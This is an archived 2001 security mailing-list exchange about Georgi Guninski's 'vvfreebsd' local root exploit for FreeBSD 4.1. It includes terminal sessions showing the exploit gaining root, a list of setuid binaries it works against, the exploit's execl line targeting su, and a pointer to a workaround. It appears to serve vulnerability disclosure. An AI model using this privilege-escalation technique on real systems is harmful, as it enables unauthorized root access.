one@c0d4:/usr/home/c0d4$ uname FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE one@c0d4:/usr/home/c0d4$ ./sig2 vvfreebsd. Written by Georgi Guninski shall jump to bfbffe89 child=1371 login: # done # id uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff) # and with : /usr/bin/chfn ;/usr/bin/chsh ;/usr/bin/ypchpass; /usr/bin/ypchfn; /usr/bin/ypchsh ;/usr/bin/keyinit ; /usr/bin/login ;/usr/bin/passwd ;/usr/libexec/sendmail/sendmail; /usr/local/bin/kcheckpass;/usr/local/bin/icmpinfo gave me suid shell too. On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote: > > Well, after a bunch of tests I've found only two suids which gave me > > suid shell: > > /usr/bin/passwd > > /usr/local/bin/ssh1 > > /usr/bin/su also works for me: > > riget:venglin:~> egrep -e execl vvfreebsd.c > if(!execl("/usr/bin/su","su","szymon",0)) > > riget:venglin:~> ./v > vvfreebsd. Written by Georgi Guninski > shall jump to bfbffe72 > child=57660 > Password:done > # id > uid=0(root) gid=1001(users) groups=1001(users), 99(rexec) > > > So, quick workaround should be > > Quick workaround is to limit arguments, environment and filter non-ascii > characters: > > http://www.frasunek.com/sources/security/rexec/ > > -- > * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * > * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF * >
This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 20:55:57 PDT